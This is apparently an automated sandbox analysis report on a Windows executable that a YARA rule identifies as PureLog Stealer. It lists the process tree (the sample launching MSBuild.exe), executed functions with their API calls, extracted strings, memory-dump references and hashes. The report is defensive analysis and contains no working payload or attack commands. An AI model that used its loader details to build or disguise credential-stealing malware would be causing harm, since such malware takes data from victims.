Target ID:	0
Start time:	03:31:38
Start date:	28/05/2024
Path:	C:\Users\user\Desktop\86KZvDaOZR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\86KZvDaOZR.exe"
Imagebase:	0x180000
File size:	3'939'792 bytes
MD5 hash:	3C2C9EE4DB3DF5B210A523088A610DA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:31:38
Start date:	28/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Imagebase:	0x550000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	12.2%
Signature Coverage:	6%
Total number of Nodes:	1196
Total number of Limit Nodes:	60

Executed Functions

Function 6CF2B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF2B73F
VariantInit.OLEAUT32(?), ref: 6CF2B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2B7F5
VariantClear.OLEAUT32(?), ref: 6CF2B801

Part of subcall function 6CF2C850: VariantInit.OLEAUT32(?), ref: 6CF2C88F
Part of subcall function 6CF2C850: VariantInit.OLEAUT32(?), ref: 6CF2C895
Part of subcall function 6CF2C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2C8A0
Part of subcall function 6CF2C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF2C8D5
Part of subcall function 6CF2C850: VariantClear.OLEAUT32(?), ref: 6CF2C8E1

VariantClear.OLEAUT32(?), ref: 6CF2BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2BE90
VariantClear.OLEAUT32(?), ref: 6CF2BEA3
VariantClear.OLEAUT32(?), ref: 6CF2BEA9

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 8e28d5e1aa8749bb3362c35f5b4155247742c6cc3634fc96cf60a24fa94890ab
Instruction ID: 23d90d61f85cdcd01bc93d37cec3c2ff15bd43e7f0b8a31016970ee735afe520
Opcode Fuzzy Hash: 8e28d5e1aa8749bb3362c35f5b4155247742c6cc3634fc96cf60a24fa94890ab
Instruction Fuzzy Hash: 32527A71901618DFCB10DFA8C880BEEBBB6FF49304F258599E909AB751DB34A945CF90

Function 05860EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LOOK, xrefs: 05861A9F
p<cq, xrefs: 0586118D
HERE, xrefs: 05860F6F
LOOK, xrefs: 05860F6A
p<cq, xrefs: 05861142
G{q, xrefs: 05861CCD
LOOK, xrefs: 05861081
G{q, xrefs: 05861243
LOOK, xrefs: 058619EB
HERE, xrefs: 058617E9
HERE, xrefs: 05861AA4
HERE, xrefs: 058619F0
p<cq, xrefs: 05861177
G{q, xrefs: 058616D2
p<cq, xrefs: 0586112C
HERE, xrefs: 058612EC
G{q, xrefs: 058614CA
HERE, xrefs: 05861592
G{q, xrefs: 05861923
HERE, xrefs: 05861086
LOOK, xrefs: 058617E4
LOOK, xrefs: 058612E7
LOOK, xrefs: 0586158D

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<cq$p<cq$p<cq$p<cq$G{q$G{q$G{q$G{q$G{q
API String ID: 0-125182453
Opcode ID: 543e110344cd624a5427c2f2209bd012f490a71b6e40475ad4393038c7f17d87
Instruction ID: 2600426fe8494b883af4ee3424f19c53d6ad7d6c156e07f45528b9b9a89d3bc3
Opcode Fuzzy Hash: 543e110344cd624a5427c2f2209bd012f490a71b6e40475ad4393038c7f17d87
Instruction Fuzzy Hash: CA829674E002298FDB64DF68C999BD9B7B2BB88310F1481E9D40DAB365DB349E81CF50

Function 6CF1B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,A64A5C11), ref: 6CF1B711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6CF1B71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6CF1B730
__cftoe.LIBCMT ref: 6CF1B870
GetModuleHandleW.KERNEL32(?), ref: 6CF1B88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6CF1B8D7

Strings

mscoree.dll, xrefs: 6CF1B70C, 6CF1B717
v4.0.30319, xrefs: 6CF1B767
CLRCreateInstance, xrefs: 6CF1B72A

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: 4591f9a8f625756459648cf683428b7328357f5a61a396972ddaea62d067a491
Instruction ID: 0b40596de0aecb266e716a8cd05c2e3a5e6d644586b331780f617ee66cfa7bd4
Opcode Fuzzy Hash: 4591f9a8f625756459648cf683428b7328357f5a61a396972ddaea62d067a491
Instruction Fuzzy Hash: 87917CB1D09289DFDB04DFE8C8809AEBBB4FF49314B608A6CE115EBB50D7319906CB55

Function 00FFA658 Relevance: 7.1, Strings: 5, Instructions: 827COMMON

Download Yara Rule

Strings

,gq, xrefs: 00FFADA7
Hgq, xrefs: 00FFB080
(ocq, xrefs: 00FFB013
,gq, xrefs: 00FFAD97
(ocq, xrefs: 00FFB009

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq$Hgq
API String ID: 0-1029698136
Opcode ID: 3a1a713725a79e43d9d25521c6b62f760d641f5967823c600220b131491ad381
Instruction ID: c8c8a49e010751ef9ed16ce1935fa28f75475570bafd2e6ddb70137cce65ee51
Opcode Fuzzy Hash: 3a1a713725a79e43d9d25521c6b62f760d641f5967823c600220b131491ad381
Instruction Fuzzy Hash: A4626E75A00119DFCB14DF69C884ABEBBB2BF88350B158169E919DB3B0DB34EC41DB91

Function 05102C78 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

lhq, xrefs: 05102CDF

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: lhq
API String ID: 0-1723968774
Opcode ID: 8e1814911984266a6d32cbcc0ca91060ee9edabb710681a658b255bcceb929c9
Instruction ID: b3b1a62c290827f250a10e2fb52417c81d2e5f12aa89144163aa8b7785dc1246
Opcode Fuzzy Hash: 8e1814911984266a6d32cbcc0ca91060ee9edabb710681a658b255bcceb929c9
Instruction Fuzzy Hash: 1551B3B5E01209AFCB04CFA8D480AEEBBF1FF49310F109469E915B7261DB719A44CF95

Function 05102A58 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

8hq, xrefs: 05102ABF

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: 8hq
API String ID: 0-4057917415
Opcode ID: 10bd179f537ca4a2fd6c3ced5e048d68c3ba2efa87d9335fe7d27bcc388aa668
Instruction ID: 7f531c2c7e3550e7601a1dd334fbf128075e5a06b087a774540a440a0f687a56
Opcode Fuzzy Hash: 10bd179f537ca4a2fd6c3ced5e048d68c3ba2efa87d9335fe7d27bcc388aa668
Instruction Fuzzy Hash: 9531B575E012099FDB04CFA9D880AEEBBF5FF49310F109069E915B7360DB709A05CB95

Function 00FF8D90 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

lo6p, xrefs: 00FF90F3

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: lo6p
API String ID: 0-3391552499
Opcode ID: eb299ad49eac1d2af277a7ff229e992c21c513e2da67968115a9a744a4d1fc39
Instruction ID: 56b4f62139de46eead02ca615f7a03129614d1a380c9ce19daa238af7c8bbd76
Opcode Fuzzy Hash: eb299ad49eac1d2af277a7ff229e992c21c513e2da67968115a9a744a4d1fc39
Instruction Fuzzy Hash: 83311771D08219CBDB28CFAAC8447AEBBB6BF89300F20D07AD509AB365DB704945DF40

Function 05102A60 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

8hq, xrefs: 05102ABF

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: 8hq
API String ID: 0-4057917415
Opcode ID: 98c8b5822f07854bd32e4c5a3ebd21470f5ebd6acfc44db4690112fb1598fed6
Instruction ID: f5e51d57f411f8bd013bd1e4ced938ffbd363db9ef25d8e5de58bdcf808b8999
Opcode Fuzzy Hash: 98c8b5822f07854bd32e4c5a3ebd21470f5ebd6acfc44db4690112fb1598fed6
Instruction Fuzzy Hash: 1731A475E01209AFDB04CFA9D480AEEFBF5FF49310F10946AE915B7260DB709A04CB95

Function 058626F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c37a0a0cf75203c03b0be75ed60246bcef69868dad168ca6b6a6059dbd64744
Instruction ID: c35076249045ddb59a72cf5a7593aaf9e7edd6043867107f23436213229b9668
Opcode Fuzzy Hash: 6c37a0a0cf75203c03b0be75ed60246bcef69868dad168ca6b6a6059dbd64744
Instruction Fuzzy Hash: CF32A374E012299FDB64DFA9C990BEDBBB2BF89300F1091AAD409A7355DB705E81CF50

Function 058626DD Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a19d5bde93e782f564adc2e5e1a5ba1f0ffccc2f2810218bf86bd931a025ef
Instruction ID: 72a6e5d367b08e84e524fa24b2f64eb9f30b896676bd1a5d695b2fc14b1388e3
Opcode Fuzzy Hash: 42a19d5bde93e782f564adc2e5e1a5ba1f0ffccc2f2810218bf86bd931a025ef
Instruction Fuzzy Hash: F991C274E012289FDB64DF69C850BDEBBF2BF89300F1481AAD849AB355DB305A85CF51

Function 05102B69 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ff175ec72080e4c36a5c3cdf61064efd65a6f9e577a56a9f2771efd0175ee9
Instruction ID: 04e13e5f5dc3a6aa6717f5e1939e87c14f979351b032380665d647e64c44ad1a
Opcode Fuzzy Hash: d8ff175ec72080e4c36a5c3cdf61064efd65a6f9e577a56a9f2771efd0175ee9
Instruction Fuzzy Hash: 6631A675E01209AFDB04DFA9D480AEEBBF5FF49310F109469E915B7360DB709A04CBA5

Function 05102B70 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efa1b6fd8d24fff2c4657634b542afad914f433ca1e8b9ce9411b3df19bb95cc
Instruction ID: 5f7a1388a3d92218eaa808de7914a2881ef6fd224b908339b9838bc613aa6a29
Opcode Fuzzy Hash: efa1b6fd8d24fff2c4657634b542afad914f433ca1e8b9ce9411b3df19bb95cc
Instruction Fuzzy Hash: 9131A475E01209AFDB04CFA9D480AEEBBF5FF49310F10946AE915B7260DB709A04CBA5

Function 6CF29357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF284BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF284D2
SafeArrayGetElement.OLEAUT32 ref: 6CF2850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF294C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF294D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF2950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF297A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF297B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF297F2

Part of subcall function 6CF23A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF23B71
Part of subcall function 6CF23A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF23B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF29D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF29D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF29DAF

Part of subcall function 6CF23A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CF23BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF2A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF2A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF2A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Strings

A, xrefs: 6CF2AD44

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: 8bc13a9257baa625be53eae034a2dfae89a7f251029ba9a75cf562e7e37666b0
Instruction ID: 4c780b259584dcf1a67c8bba24b0486b95ee5049428ecb9e79e64672623e3d0a
Opcode Fuzzy Hash: 8bc13a9257baa625be53eae034a2dfae89a7f251029ba9a75cf562e7e37666b0
Instruction Fuzzy Hash: DA238071A012059FDB00DFA8C884FDD77F9AF49308F148198EA09AB796DB79E985CF50

Function 6CF22970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF229F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF22A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF22A2F
VariantInit.OLEAUT32(?), ref: 6CF22ABB
VariantInit.OLEAUT32(?), ref: 6CF22B3F
VariantClear.OLEAUT32(?), ref: 6CF22C04
VariantClear.OLEAUT32(?), ref: 6CF22C0B
VariantClear.OLEAUT32(?), ref: 6CF22C12
VariantClear.OLEAUT32(?), ref: 6CF22C96
VariantClear.OLEAUT32(?), ref: 6CF22C9D
VariantClear.OLEAUT32(?), ref: 6CF22CD6
VariantClear.OLEAUT32(?), ref: 6CF22CDD
VariantClear.OLEAUT32(?), ref: 6CF22CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF22D1B
VariantClear.OLEAUT32(?), ref: 6CF22D45
VariantClear.OLEAUT32(?), ref: 6CF22D4C
VariantClear.OLEAUT32(?), ref: 6CF22D53

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: f766db4ba980f609bcf4f947a91dfd036bae719d2233d8ce9f3ea52a49850199
Instruction ID: 3a05b78d48cb2ba73a04f8feb388ee5fee68ce1acbb57bcedb5a0e5d4da848ea
Opcode Fuzzy Hash: f766db4ba980f609bcf4f947a91dfd036bae719d2233d8ce9f3ea52a49850199
Instruction Fuzzy Hash: 37C159726183419FD700CFA8C888A5BBBF9BF89314F20895DF595CB260D77AE845CB52

Function 6CF1AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF1AF75
VariantInit.OLEAUT32(?), ref: 6CF1AF7C
VariantInit.OLEAUT32(?), ref: 6CF1AF83
VariantCopy.OLEAUT32(?,?), ref: 6CF1B00D
VariantClear.OLEAUT32(?), ref: 6CF1B027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF1B19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF1B1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6CF1B1C5
_memmove.LIBCMT ref: 6CF1B1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6CF1B1EF
VariantClear.OLEAUT32(?), ref: 6CF1B237
VariantClear.OLEAUT32(?), ref: 6CF1B23E
VariantClear.OLEAUT32(?), ref: 6CF1B245
VariantClear.OLEAUT32(?), ref: 6CF1B29D
VariantClear.OLEAUT32(?), ref: 6CF1B2A4
VariantClear.OLEAUT32(?), ref: 6CF1B2AB

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: 6be70abb4605caedbdef86cdb59a97234d1bbcb0c30633a92a44c2ead21fc592
Instruction ID: bec714269bfe3cd01cf728ba856a1ca2d72ac1906f633fdf99c0e7626af15bc3
Opcode Fuzzy Hash: 6be70abb4605caedbdef86cdb59a97234d1bbcb0c30633a92a44c2ead21fc592
Instruction Fuzzy Hash: 65C157B26083419FD700DFA9C884A5BB7F9FB89304F154A6DE659C7B50D730E909CBA2

Function 6CF2D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF2D4B3
VariantInit.OLEAUT32 ref: 6CF2D4C5
VariantInit.OLEAUT32(?), ref: 6CF2D4CC
_malloc.LIBCMT ref: 6CF2D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF2D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CF2D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CF2D5B8

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: d1549601741c08aaa85993d694e34e379cf0f1a2c1e0948afaa6fe3780f02394
Instruction ID: 864f80c37ac9b2a07b99b1e2a700e9114ec5c5d39a84de92b1a78cb4aacfedde
Opcode Fuzzy Hash: d1549601741c08aaa85993d694e34e379cf0f1a2c1e0948afaa6fe3780f02394
Instruction Fuzzy Hash: CDB144766083409FD314CF68C880A6BBBF9FF89318F14895DE89997750E778E905CB92

Function 6CF2D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF2D4B3
VariantInit.OLEAUT32 ref: 6CF2D4C5
VariantInit.OLEAUT32(?), ref: 6CF2D4CC
_malloc.LIBCMT ref: 6CF2D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF2D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CF2D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CF2D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2D63E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
